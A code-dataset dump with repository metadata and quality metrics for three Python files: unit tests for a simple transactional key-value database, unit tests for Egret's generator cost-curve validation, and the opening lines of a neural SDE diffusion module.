hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
13da1d4f70aaca3db046cf8ee091cdd0130ab8fb
| 11,412
|
py
|
Python
|
test.py
|
ShamansCoding/simple_database
|
a342496c545254f85ed97ed1bf79a07e8ecf7ebf
|
[
"MIT"
] | null | null | null |
test.py
|
ShamansCoding/simple_database
|
a342496c545254f85ed97ed1bf79a07e8ecf7ebf
|
[
"MIT"
] | null | null | null |
test.py
|
ShamansCoding/simple_database
|
a342496c545254f85ed97ed1bf79a07e8ecf7ebf
|
[
"MIT"
] | null | null | null |
import sys
import unittest
try:
from StringIO import StringIO
except ModuleNotFoundError:
from io import StringIO
try:
from unittest.mock import patch
except ImportError:
from mock import patch
from data_base import DataBase, call_method, main, HELP
class MockForTest(object):
def some_method(self, args):
return 'success'
class DataBaseTest(unittest.TestCase):
def setUp(self):
self.database = DataBase()
def test_set(self):
self.database.SET('A', '10')
self.assertEqual(self.database._storage, {'A': '10'})
def test_set_twice(self):
self.database.SET('A', '10')
self.database.SET('A', '10')
self.assertEqual(self.database._storage, {'A': '10'})
def test_set_two_values(self):
self.database.SET('A', '10')
self.database.SET('B', '10')
self.assertEqual(self.database._storage, {'A': '10', 'B': '10'})
def test_set_in_transaction(self):
self.database._storage = {'A': '10'}
self.database._transaction_number = 1
self.database._rollback_cache[1] = []
self.database.SET('B', '20')
self.assertEqual(self.database._storage, {'A': '10', 'B': '20'})
self.assertEqual(self.database._rollback_cache,
{1: [('UNSET', 'B')]})
def test_set_in_transaction_twice(self):
self.database._storage = {'A': '10'}
self.database._transaction_number = 1
self.database._rollback_cache[1] = []
self.database.SET('B', '20')
self.database.SET('B', '20')
self.assertEqual(self.database._storage, {'A': '10', 'B': '20'})
self.assertEqual(self.database._rollback_cache,
{1: [('UNSET', 'B'), ('SET', 'B', '20')]})
def test_set_in_transaction_rolling_back(self):
self.database._storage = {'A': '10'}
self.database._transaction_number = 1
self.database._rollback_cache[1] = []
self.database._rolling_back = True
self.database.SET('B', '20')
self.assertEqual(self.database._storage, {'A': '10', 'B': '20'})
self.assertEqual(self.database._rollback_cache, {1: []})
def test_get(self):
self.database._storage = {'A': '10'}
capturedOutput = StringIO()
sys.stdout = capturedOutput
self.database.GET('A')
sys.stdout = sys.__stdout__
self.assertEqual(capturedOutput.getvalue(), '10\n')
def test_get_null(self):
capturedOutput = StringIO()
sys.stdout = capturedOutput
self.database.GET('A')
sys.stdout = sys.__stdout__
self.assertEqual(capturedOutput.getvalue(), 'NULL\n')
def test_unset(self):
self.database._storage = {'A': '10'}
self.database.UNSET('A')
self.assertEqual(self.database._storage, {})
def test_unset_no_key(self):
self.database._storage = {}
self.database.UNSET('A')
self.assertEqual(self.database._storage, {})
def test_unset_in_transaction(self):
self.database._storage = {'A': '10'}
self.database._transaction_number = 1
self.database._rollback_cache[1] = []
self.database.UNSET('A')
self.assertEqual(self.database._storage, {})
self.assertEqual(self.database._rollback_cache,
{1: [('SET', 'A', '10')]})
def test_unset_in_transaction_twice(self):
self.database._storage = {'A': '10'}
self.database._transaction_number = 1
self.database._rollback_cache[1] = []
self.database.UNSET('A')
self.database.UNSET('A')
self.assertEqual(self.database._storage, {})
self.assertEqual(self.database._rollback_cache,
{1: [('SET', 'A', '10')]})
def test_unset_in_transaction_rolling_back(self):
self.database._storage = {'A': '10'}
self.database._transaction_number = 1
self.database._rollback_cache[1] = []
self.database._rolling_back = True
self.database.UNSET('A')
self.assertEqual(self.database._storage, {})
self.assertEqual(self.database._rollback_cache, {1: []})
def test_counts(self):
self.database._storage = {'A': '10'}
capturedOutput = StringIO()
sys.stdout = capturedOutput
self.database.COUNTS('10')
sys.stdout = sys.__stdout__
self.assertEqual(capturedOutput.getvalue(), '1\n')
def test_counts_no_value(self):
self.database._storage = {'A': '11'}
capturedOutput = StringIO()
sys.stdout = capturedOutput
self.database.COUNTS('10')
sys.stdout = sys.__stdout__
self.assertEqual(capturedOutput.getvalue(), '0\n')
def test_counts_two_values(self):
self.database._storage = {'A': '10', 'B': '10'}
capturedOutput = StringIO()
sys.stdout = capturedOutput
self.database.COUNTS('10')
sys.stdout = sys.__stdout__
self.assertEqual(capturedOutput.getvalue(), '2\n')
def test_find(self):
self.database._storage = {'A': '10'}
capturedOutput = StringIO()
sys.stdout = capturedOutput
self.database.FIND('10')
sys.stdout = sys.__stdout__
self.assertEqual(capturedOutput.getvalue(), 'A\n')
def test_find_no_value(self):
self.database._storage = {'A': '11'}
capturedOutput = StringIO()
sys.stdout = capturedOutput
self.database.FIND('10')
sys.stdout = sys.__stdout__
self.assertEqual(capturedOutput.getvalue(), '\n')
def test_find_two_values(self):
self.database._storage = {'A': '10', 'B': '10'}
capturedOutput = StringIO()
sys.stdout = capturedOutput
self.database.FIND('10')
sys.stdout = sys.__stdout__
self.assertEqual(capturedOutput.getvalue(), 'A B\n')
def test_begin(self):
self.assertEqual(self.database._transaction_number, 0)
self.assertEqual(self.database._rollback_cache, {})
self.database.BEGIN()
self.assertEqual(self.database._transaction_number, 1)
self.assertEqual(self.database._rollback_cache, {1: []})
def test_begin_twice(self):
self.assertEqual(self.database._transaction_number, 0)
self.assertEqual(self.database._rollback_cache, {})
self.database.BEGIN()
self.assertEqual(self.database._transaction_number, 1)
self.assertEqual(self.database._rollback_cache, {1: []})
self.database.BEGIN()
self.assertEqual(self.database._transaction_number, 2)
self.assertEqual(self.database._rollback_cache, {1: [], 2: []})
def test_rollback(self):
self.assertEqual(self.database._transaction_number, 0)
self.assertEqual(self.database._rollback_cache, {})
self.assertEqual(self.database._rolling_back, False)
self.database._transaction_number = 1
self.database._storage = {'A': '10', 'B': '10'}
self.database._rollback_cache = {1: [('UNSET', 'B')]}
self.database.ROLLBACK()
self.assertEqual(self.database._transaction_number, 0)
self.assertEqual(self.database._rollback_cache, {})
self.assertEqual(self.database._rolling_back, False)
self.assertEqual(self.database._storage, {'A': '10'})
def test_rollback_same_key_edited_twice(self):
self.assertEqual(self.database._transaction_number, 0)
self.assertEqual(self.database._rollback_cache, {})
self.assertEqual(self.database._rolling_back, False)
self.database._transaction_number = 1
self.database._storage = {'A': '10'}
self.database._rollback_cache = {1: [('UNSET', 'B'),
('SET', 'B', '10')]}
self.database.ROLLBACK()
self.assertEqual(self.database._transaction_number, 0)
self.assertEqual(self.database._rollback_cache, {})
self.assertEqual(self.database._rolling_back, False)
self.assertEqual(self.database._storage, {'A': '10'})
def test_rollback_nested(self):
self.assertEqual(self.database._transaction_number, 0)
self.assertEqual(self.database._rollback_cache, {})
self.assertEqual(self.database._rolling_back, False)
self.database._transaction_number = 2
self.database._storage = {'A': '10', 'B': '10'}
self.database._rollback_cache = {1: [('UNSET', 'B')],
2: [('SET', 'C', '3')]}
self.database.ROLLBACK()
self.assertEqual(self.database._transaction_number, 1)
self.assertEqual(self.database._rollback_cache, {1: [('UNSET', 'B')]})
self.assertEqual(self.database._rolling_back, False)
self.assertEqual(self.database._storage,
{'A': '10', 'C': '3', 'B': '10'})
def test_commit(self):
self.database._transaction_number = 1
self.database._rollback_cache = {1: [('UNSET', 'B')]}
self.database.COMMIT()
self.assertEqual(self.database._transaction_number, 0)
self.assertEqual(self.database._rollback_cache, {})
class CallMethodTest(unittest.TestCase):
def setUp(self):
self.test_instance = MockForTest()
def test_call_method(self):
result = call_method(self.test_instance, ['some_method', '1'])
self.assertTrue(result)
def test_call_method_invalid_name(self):
capturedOutput = StringIO()
sys.stdout = capturedOutput
result = call_method(self.test_instance, ['invalid_method', '1'])
self.assertFalse(result)
sys.stdout = sys.__stdout__
self.assertEqual(
capturedOutput.getvalue(),
' -> Invalid method name. To get methods names type HELP.\n'
)
def test_call_method_invalid_args_number(self):
capturedOutput = StringIO()
sys.stdout = capturedOutput
result = call_method(self.test_instance, ['some_method'])
self.assertFalse(result)
sys.stdout = sys.__stdout__
self.assertEqual(
capturedOutput.getvalue(),
' -> Invalid number of argumets for some_method\n'
)
class MainTest(unittest.TestCase):
@patch('data_base.call_method')
@patch('data_base.input')
def test_main(self, mock_input, mock_call_method):
mock_input.side_effect = ['METHOD', 'END']
mock_call_method.return_value = sys.exit
capturedOutput = StringIO()
sys.stdout = capturedOutput
main()
sys.stdout = sys.__stdout__
self.assertEqual(
capturedOutput.getvalue(),
('Welcome to simple database! Type HELP for help.\n'
'Exiting database...\n')
)
@patch('data_base.call_method')
@patch('data_base.input')
def test_main_help(self, mock_input, mock_call_method):
mock_input.side_effect = ['HELP', 'END']
mock_call_method.return_value = sys.exit
capturedOutput = StringIO()
sys.stdout = capturedOutput
main()
sys.stdout = sys.__stdout__
self.assertEqual(
capturedOutput.getvalue(),
('Welcome to simple database! Type HELP for help.\n' +
HELP + '\n' +
'Exiting database...\n')
)
if __name__ == '__main__':
unittest.main()
| 30.513369
| 78
| 0.616018
| 1,253
| 11,412
| 5.357542
| 0.078212
| 0.216297
| 0.141516
| 0.201102
| 0.883361
| 0.864591
| 0.854164
| 0.847162
| 0.829584
| 0.796067
| 0
| 0.018714
| 0.246144
| 11,412
| 373
| 79
| 30.595174
| 0.761595
| 0
| 0
| 0.660232
| 0
| 0
| 0.056344
| 0.00368
| 0
| 0
| 0
| 0
| 0.250965
| 1
| 0.127413
| false
| 0
| 0.030888
| 0.003861
| 0.177606
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13db9c0d5b3894c08c7d618e08b4abc5b6674e99
| 26,760
|
py
|
Python
|
egret/model_library/transmission/tests/test_tx_utils.py
|
barguel/Egret
|
2df021d08ca4c1722a7b16eab3f512ba0e7c6a1d
|
[
"BSD-3-Clause"
] | null | null | null |
egret/model_library/transmission/tests/test_tx_utils.py
|
barguel/Egret
|
2df021d08ca4c1722a7b16eab3f512ba0e7c6a1d
|
[
"BSD-3-Clause"
] | null | null | null |
egret/model_library/transmission/tests/test_tx_utils.py
|
barguel/Egret
|
2df021d08ca4c1722a7b16eab3f512ba0e7c6a1d
|
[
"BSD-3-Clause"
] | 1
|
2021-08-18T16:44:20.000Z
|
2021-08-18T16:44:20.000Z
|
import unittest
from egret.model_library.transmission import tx_utils
import logging
import copy
def _example_quadratic(p):
return 0.05 * p ** 2 + p + 3
def example_pw_curve():
curve = dict()
curve['data_type'] = 'cost_curve'
curve['cost_curve_type'] = 'piecewise'
curve['values'] = [(10, _example_quadratic(10)),
(30, _example_quadratic(30)),
(50, _example_quadratic(50)),
(70, _example_quadratic(70)),
(90, _example_quadratic(90))]
return curve
def example_poly_curve():
curve = dict()
curve['data_type'] = 'cost_curve'
curve['cost_curve_type'] = 'polynomial'
curve['values'] = {0: 3, 1: 1, 2: 0.05}
return curve
class TestValidateCostCurves(unittest.TestCase):
def test_pw_simple(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=90,
gen_name='foo',
t=None)
self.assertEqual(cleaned_values, curve['values'])
self.assertIsNot(cleaned_values, curve['values'])
def test_wrong_curve_type(self):
curve = example_pw_curve()
curve['data_type'] = 'blah'
with self.assertRaises(ValueError):
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=90,
gen_name='foo',
t=None)
def test_pw_no_values(self):
curve = example_pw_curve()
curve['values'] = list()
with self.assertLogs('egret.model_library.transmission.tx_utils', level=logging.WARNING) as cm:
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=90,
gen_name='foo',
t=None)
self.assertEqual(cleaned_values, curve['values'])
self.assertIsNot(cleaned_values, curve['values'])
self.assertEqual(cm.output, ['WARNING:egret.model_library.transmission.tx_utils:WARNING: Generator foo has no cost information associated with it'])
def test_pw_repeat_value_and_cost(self):
curve = example_pw_curve()
orig_values = copy.deepcopy(curve['values'])
curve['values'].insert(2, (30, _example_quadratic(30)))
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=90,
gen_name='foo',
t=None)
self.assertEqual(cleaned_values, orig_values)
def test_pw_repeat_value(self):
curve = example_pw_curve()
curve['values'].insert(2, (30, _example_quadratic(40)))
with self.assertRaises(ValueError):
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=90,
gen_name='foo',
t=None)
def test_pw_nonconvex(self):
curve = example_pw_curve()
curve['values'].insert(2, (35, _example_quadratic(20)))
with self.assertRaises(ValueError):
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=90,
gen_name='foo',
t=None)
def test_pw_low_p_min(self):
curve = example_pw_curve()
expected_values = copy.deepcopy(curve['values'])
expected_values.pop(0)
expected_values.insert(0, (5, 3))
with self.assertLogs('egret.model_library.transmission.tx_utils', level=logging.WARNING) as cm:
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=5,
p_max=90,
gen_name='foo',
t=None)
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(cleaned_values, curve['values'])
self.assertEqual(cm.output, ['WARNING:egret.model_library.transmission.tx_utils:WARNING: Extending piecewise linear cost curve beyond p_min and/or p_max for generator foo (and perhaps others)'])
# reset for next test
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_pw_high_p_max(self):
curve = example_pw_curve()
expected_values = copy.deepcopy(curve['values'])
expected_values.pop(-1)
expected_values.append((95, 543))
with self.assertLogs('egret.model_library.transmission.tx_utils', level=logging.WARNING) as cm:
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=95,
gen_name='foo',
t=None)
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(cleaned_values, curve['values'])
self.assertEqual(cm.output, ['WARNING:egret.model_library.transmission.tx_utils:WARNING: Extending piecewise linear cost curve beyond p_min and/or p_max for generator foo (and perhaps others)'])
# reset for next test
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_pw_high_p_max_low_p_min_debug(self):
curve = example_pw_curve()
# evoke warning once
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=95,
gen_name='foo',
t=None)
expected_values = example_pw_curve()['values']
expected_values.pop(-1)
expected_values.append((95, 543))
expected_values.pop(0)
expected_values.insert(0, (5, 3))
with self.assertLogs('egret.model_library.transmission.tx_utils', level=logging.DEBUG) as cm:
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=5,
p_max=95,
gen_name='foo',
t=None)
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(cleaned_values, curve['values'])
# debug output this time
self.assertEqual(cm.output, ['DEBUG:egret.model_library.transmission.tx_utils:WARNING: Extending piecewise linear cost curve beyond p_min and/or p_max for generator foo'])
# reset for next test
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_extra_pw_pieces_below_pmin(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=30,
p_max=90,
gen_name='foo',
t=None)
self.assertEqual(cleaned_values, curve['values'][1:])
self.assertIsNot(cleaned_values, curve['values'])
def test_extra_pw_pieces_below_pmin2(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=85,
p_max=90,
gen_name='foo',
t=None)
expected_values = [(85, 453), (90, 498)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(cleaned_values, curve['values'])
def test_extra_pw_pieces_above_pmax(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=70,
gen_name='foo',
t=None)
self.assertEqual(cleaned_values, curve['values'][:-1])
self.assertIsNot(cleaned_values, curve['values'])
def test_extra_pw_pieces_above_pmax2(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=15,
gen_name='foo',
t=None)
expected_values = [(10,18), (15,33)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(cleaned_values, curve['values'])
def test_pw_repeated_slope(self):
curve = dict()
curve['data_type'] = 'cost_curve'
curve['cost_curve_type'] = 'piecewise'
curve['values'] = [(10, 20),
(30, 40),
(50, 60),
(70, 80),
(90, 100)]
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=90,
gen_name='foo',
t=None)
expected_values = [(10, 20), (90, 100)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
def test_pw_repeated_slope2(self):
curve = dict()
curve['data_type'] = 'cost_curve'
curve['cost_curve_type'] = 'piecewise'
curve['values'] = [(10, 20),
(30, 40),
(50, 60),
(70, 90),
(90, 120)]
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=5,
p_max=100,
gen_name='foo',
t=None)
expected_values = [(5, 15), (50,60), (100, 135)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_pw_pmin_is_pmax_on_curve(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=40,
p_max=40,
gen_name='foo',
t=None)
expected_values = [(40, 128)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
def test_pw_pmin_is_pmax_single_point(self):
curve = example_pw_curve()
curve = dict()
curve['data_type'] = 'cost_curve'
curve['cost_curve_type'] = 'piecewise'
curve['values'] = [(40,128)]
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=40,
p_max=40,
gen_name='foo',
t=None)
expected_values = [(40, 128)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
def test_pmax_less_than_first_point(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=-5,
p_max=5,
gen_name='foo',
t=None)
expected_values = [(-5, -27), (5, 3)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_pmax_less_than_first_point2(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=5,
p_max=5,
gen_name='foo',
t=None)
expected_values = [(5, 3)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_pmax_is_first_point(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=0,
p_max=10,
gen_name='foo',
t=None)
expected_values = [(0, -12), (10, 18)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_pmax_is_first_point2(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=10,
p_max=10,
gen_name='foo',
t=None)
expected_values = [(10, 18)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_pmin_greater_than_last_point(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=100,
p_max=110,
gen_name='foo',
t=None)
expected_values = [(100, 588), (110, 678)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_pmin_greater_than_last_point2(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=100,
p_max=100,
gen_name='foo',
t=None)
expected_values = [(100, 588)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_pmin_is_last_point(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=90,
p_max=110,
gen_name='foo',
t=None)
expected_values = [(90, 498), (110, 678)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_pmin_is_last_point2(self):
curve = example_pw_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=90,
p_max=90,
gen_name='foo',
t=None)
expected_values = [(90, 498)]
self.assertEqual(cleaned_values, expected_values)
self.assertIsNot(expected_values, curve['values'])
tx_utils.validate_and_clean_cost_curve._printed_warning = False
def test_pw_single_point_raises_value_error(self):
curve = example_pw_curve()
curve = dict()
curve['data_type'] = 'cost_curve'
curve['cost_curve_type'] = 'piecewise'
curve['values'] = [(40,128)]
with self.assertRaises(ValueError):
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=30,
p_max=30,
gen_name='foo',
t=None)
with self.assertRaises(ValueError):
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=30,
p_max=40,
gen_name='foo',
t=None)
with self.assertRaises(ValueError):
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=30,
p_max=50,
gen_name='foo',
t=None)
with self.assertRaises(ValueError):
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=40,
p_max=50,
gen_name='foo',
t=None)
with self.assertRaises(ValueError):
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=45,
p_max=50,
gen_name='foo',
t=None)
def test_poly_simple(self):
curve = example_poly_curve()
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=15,
p_max=85,
gen_name='foo',
t=None)
self.assertEqual(cleaned_values, curve['values'])
self.assertIsNot(cleaned_values, curve['values'])
def test_poly_nonconvex(self):
curve = example_poly_curve()
curve['values'][2] = -1
with self.assertRaises(ValueError):
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=15,
p_max=85,
gen_name='foo',
t=None)
def test_poly_cubic(self):
curve = example_poly_curve()
curve['values'][3] = 1
with self.assertRaises(ValueError):
cleaned_values = tx_utils.validate_and_clean_cost_curve(curve=curve,
curve_type='cost_curve',
p_min=15,
p_max=85,
gen_name='foo',
t=None)
| 58.173913
| 202
| 0.403251
| 2,165
| 26,760
| 4.617552
| 0.06836
| 0.118035
| 0.102031
| 0.082825
| 0.927078
| 0.913574
| 0.903971
| 0.884765
| 0.879964
| 0.86676
| 0
| 0.029279
| 0.529036
| 26,760
| 459
| 203
| 58.300654
| 0.763945
| 0.003774
| 0
| 0.8
| 0
| 0.009639
| 0.064195
| 0.014783
| 0
| 0
| 0
| 0
| 0.151807
| 1
| 0.077108
| false
| 0
| 0.009639
| 0.00241
| 0.096386
| 0.028916
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13ee560085ba5c852677a29b3babe39e4385de9c
| 876
|
py
|
Python
|
models/diffusion_fn.py
|
xuanqing94/NeuralSDE
|
f3511799cfc9c3d6b95ff9bcb07563df88715e0c
|
[
"MIT"
] | 5
|
2020-06-28T07:15:35.000Z
|
2022-01-20T01:52:31.000Z
|
models/diffusion_fn.py
|
xuanqing94/NeuralSDE
|
f3511799cfc9c3d6b95ff9bcb07563df88715e0c
|
[
"MIT"
] | null | null | null |
models/diffusion_fn.py
|
xuanqing94/NeuralSDE
|
f3511799cfc9c3d6b95ff9bcb07563df88715e0c
|
[
"MIT"
] | null | null | null |
# Different noise types
# TODO implement jump-duffusion noises
import torch
